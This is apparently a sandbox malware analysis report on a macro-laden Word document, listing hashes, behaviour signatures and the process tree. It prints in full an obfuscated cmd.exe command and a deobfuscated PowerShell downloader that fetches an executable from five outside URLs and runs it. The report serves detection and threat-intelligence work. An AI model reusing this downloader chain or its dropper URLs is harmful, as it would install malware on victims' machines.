Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
-
submitted
06-05-2024 00:34
General
-
Target
19ebd314b039cce609724b9e42a9257f_JaffaCakes118.doc
-
Size
238KB
-
MD5
19ebd314b039cce609724b9e42a9257f
-
SHA1
2238cc692817a82f557ee4b9731658e9c9154b18
-
SHA256
df4776a1720feb2cdd8fcc4a91b298854bea7a86e172485cc64c318e4cbad89a
-
SHA512
77f63e04b9600a4a915ce5728e32739c7a39cab5e303ff6472115a00ce57a773b6238fb02f0c6f251fb3dd8a5ece4a38031b41898f4ab6fc04af7acd7e77b3e3
-
SSDEEP
3072:7Ttrd7SmTEFDGcmFsRGXtHjVJ/UjL/xSu90OoiLuDKZXfwKeljR1X:7TtrdGmU6sA9HRJ/ixUOmD+XfwLD
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://tolanimusic.com/FgGLYFx2fxkRLqu_ns1avpR1Z
exe.dropper
http://techfactory.pk/d0vjo7vRJw26C_G3JYE01qG
exe.dropper
http://wozup.org/xhcaRjfp3m4KS_HnX
exe.dropper
http://bentom.ru/1Bl14v64v9_POmBW662
exe.dropper
http://13r.lg.ua/IsvJO35t6kj
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 5 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
-
Drops file in Windows directory 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies Internet Explorer settings 1 TTPs 31 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 40 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\19ebd314b039cce609724b9e42a9257f_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\cmd.exec:\bmiz\sfkz\wtnk\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set hJgH=5NmRJatXg6\%o,Bzd$q.F(sDE2;:SxZ)_fU-9/c'e=}uLjWTl+@IykK~Pw73b{i4n0Ypv1CHrGhM AO&&for %8 in (67,12,57,11,56,34,14,44,51,70,27,55,0,13,69,11,72,11,28,24,28,28,51,78,1,1,77,75,24,27,55,35,63,13,69,11,74,11,47,24,75,56,27,55,35,59,13,69,11,48,48,76,17,64,6,2,43,41,39,45,2,6,60,39,26,17,15,72,15,33,41,64,40,57,35,12,60,45,40,38,6,76,1,40,6,19,46,40,60,70,48,62,40,64,6,26,17,33,12,57,67,53,41,39,74,6,6,67,27,37,37,6,12,48,5,64,62,2,43,22,62,38,19,38,12,2,37,20,8,73,44,66,20,29,25,33,29,53,3,44,18,43,32,64,22,69,5,68,67,3,69,30,50,74,6,6,67,27,37,37,6,40,38,74,33,5,38,6,12,72,52,19,67,53,37,16,65,68,45,12,58,68,3,4,57,25,9,70,32,73,59,4,66,24,65,69,18,73,50,74,6,6,67,27,37,37,57,12,15,43,67,19,12,72,8,37,29,74,38,5,3,45,33,67,59,2,63,54,28,32,71,64,7,50,74,6,6,67,27,37,37,60,40,64,6,12,2,19,72,43,37,69,14,48,69,63,68,9,63,68,36,32,56,78,2,14,46,9,9,25,50,74,6,6,67,27,37,37,69,59,72,19,48,8,19,43,5,37,51,22,68,4,78,59,0,6,9,53,45,39,19,28,67,48,62,6,21,39,50,39,31,26,17,64,18,38,33,41,39,62,2,67,74,45,39,26,17,15,22,57,67,57,76,41,76,39,9,25,65,39,26,17,33,6,2,67,41,39,62,43,15,60,48,39,26,17,38,12,60,74,41,17,40,64,68,27,6,40,2,67,49,39,10,39,49,17,15,22,57,67,57,49,39,19,40,29,40,39,26,33,12,72,40,5,38,74,21,17,68,57,72,57,15,76,62,64,76,17,33,12,57,67,53,31,61,6,72,52,61,17,15,72,15,33,19,23,12,57,64,48,12,5,16,20,62,48,40,21,17,68,57,72,57,15,13,76,17,38,12,60,74,31,26,17,12,12,57,62,2,41,39,48,33,57,64,39,26,51,33,76,21,21,73,40,6,35,51,6,40,2,76,17,38,12,60,74,31,19,48,40,64,8,6,74,76,35,8,40,76,63,65,65,65,65,31,76,61,51,64,68,12,53,40,35,51,6,40,2,76,17,38,12,60,74,26,17,12,6,2,33,53,41,39,6,16,2,5,39,26,60,72,40,5,53,26,42,42,38,5,6,38,74,61,42,42,17,48,57,6,18,5,41,39,15,6,57,72,57,39,26,86)do set loL=!loL!!hJgH:~%8,1!&&if %8 equ 86 echo !loL:*loL!=!|FOR /F "delims=G=Yf tokens=2" %B IN ('assoc^^^|findstr mdfi')DO %B "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeCmD /V/C"set hJgH=5NmRJatXg6\%o,Bzd$q.F(sDE2;:SxZ)_fU-9/c'e=}uLjWTl+@IykK~Pw73b{i4n0Ypv1CHrGhM AO&&for %8 in (67,12,57,11,56,34,14,44,51,70,27,55,0,13,69,11,72,11,28,24,28,28,51,78,1,1,77,75,24,27,55,35,63,13,69,11,74,11,47,24,75,56,27,55,35,59,13,69,11,48,48,76,17,64,6,2,43,41,39,45,2,6,60,39,26,17,15,72,15,33,41,64,40,57,35,12,60,45,40,38,6,76,1,40,6,19,46,40,60,70,48,62,40,64,6,26,17,33,12,57,67,53,41,39,74,6,6,67,27,37,37,6,12,48,5,64,62,2,43,22,62,38,19,38,12,2,37,20,8,73,44,66,20,29,25,33,29,53,3,44,18,43,32,64,22,69,5,68,67,3,69,30,50,74,6,6,67,27,37,37,6,40,38,74,33,5,38,6,12,72,52,19,67,53,37,16,65,68,45,12,58,68,3,4,57,25,9,70,32,73,59,4,66,24,65,69,18,73,50,74,6,6,67,27,37,37,57,12,15,43,67,19,12,72,8,37,29,74,38,5,3,45,33,67,59,2,63,54,28,32,71,64,7,50,74,6,6,67,27,37,37,60,40,64,6,12,2,19,72,43,37,69,14,48,69,63,68,9,63,68,36,32,56,78,2,14,46,9,9,25,50,74,6,6,67,27,37,37,69,59,72,19,48,8,19,43,5,37,51,22,68,4,78,59,0,6,9,53,45,39,19,28,67,48,62,6,21,39,50,39,31,26,17,64,18,38,33,41,39,62,2,67,74,45,39,26,17,15,22,57,67,57,76,41,76,39,9,25,65,39,26,17,33,6,2,67,41,39,62,43,15,60,48,39,26,17,38,12,60,74,41,17,40,64,68,27,6,40,2,67,49,39,10,39,49,17,15,22,57,67,57,49,39,19,40,29,40,39,26,33,12,72,40,5,38,74,21,17,68,57,72,57,15,76,62,64,76,17,33,12,57,67,53,31,61,6,72,52,61,17,15,72,15,33,19,23,12,57,64,48,12,5,16,20,62,48,40,21,17,68,57,72,57,15,13,76,17,38,12,60,74,31,26,17,12,12,57,62,2,41,39,48,33,57,64,39,26,51,33,76,21,21,73,40,6,35,51,6,40,2,76,17,38,12,60,74,31,19,48,40,64,8,6,74,76,35,8,40,76,63,65,65,65,65,31,76,61,51,64,68,12,53,40,35,51,6,40,2,76,17,38,12,60,74,26,17,12,6,2,33,53,41,39,6,16,2,5,39,26,60,72,40,5,53,26,42,42,38,5,6,38,74,61,42,42,17,48,57,6,18,5,41,39,15,6,57,72,57,39,26,86)do set loL=!loL!!hJgH:~%8,1!&&if %8 equ 86 echo !loL:*loL!=!|FOR /F "delims=G=Yf tokens=2" %B IN ('assoc^^^|findstr mdfi')DO %B "3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $ntmu='jmtb';$zrzf=new-object Net.WebClient;$fowpk='http://tolanimusic.com/FgGLYFx2fxkRLqu_ns1avpR1Z@http://techfactory.pk/d0vjo7vRJw26C_G3JYE01qG@http://wozup.org/xhcaRjfp3m4KS_HnX@http://bentom.ru/1Bl14v64v9_POmBW662@http://13r.lg.ua/IsvJO35t6kj'.Split('@');$nqcf='imphj';$zswpw = '620';$ftmp='iuzbl';$cobh=$env:temp+'\'+$zswpw+'.exe';foreach($vwrwz in $fowpk){try{$zrzf.DownloadFile($vwrwz, $cobh);$oowim='lfwn';If ((Get-Item $cobh).length -ge 40000) {Invoke-Item $cobh;$otmfk='tdma';break;}}catch{}}$lwtqa='ztwrw';"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=G=Yf tokens=2" %B IN ('assoc^|findstr mdfi') DO %B "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c assoc|findstr mdfi5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" assoc"6⤵
-
-
C:\Windows\SysWOW64\findstr.exefindstr mdfi6⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $ntmu='jmtb';$zrzf=new-object Net.WebClient;$fowpk='http://tolanimusic.com/FgGLYFx2fxkRLqu_ns1avpR1Z@http://techfactory.pk/d0vjo7vRJw26C_G3JYE01qG@http://wozup.org/xhcaRjfp3m4KS_HnX@http://bentom.ru/1Bl14v64v9_POmBW662@http://13r.lg.ua/IsvJO35t6kj'.Split('@');$nqcf='imphj';$zswpw = '620';$ftmp='iuzbl';$cobh=$env:temp+'\'+$zswpw+'.exe';foreach($vwrwz in $fowpk){try{$zrzf.DownloadFile($vwrwz, $cobh);$oowim='lfwn';If ((Get-Item $cobh).length -ge 40000) {Invoke-Item $cobh;$otmfk='tdma';break;}}catch{}}$lwtqa='ztwrw';6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5ef2780dd271cacceb744424dc548c3bd
SHA18a4db6e8242c1bc3447fb5f1c35e526e3e2ccf2d
SHA256d54d3648861ae8d3283d87b6eebce4178a33dc87a4dcd03494110f7da458913f
SHA51241e12c309fdb7348122333435c7581668d343f6dc62967db29f08e198c6f3f0013d28ee3ae01a1985696d408595fe8348bdd0569d353e10bff58b4f9eb0d5564
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
1024KB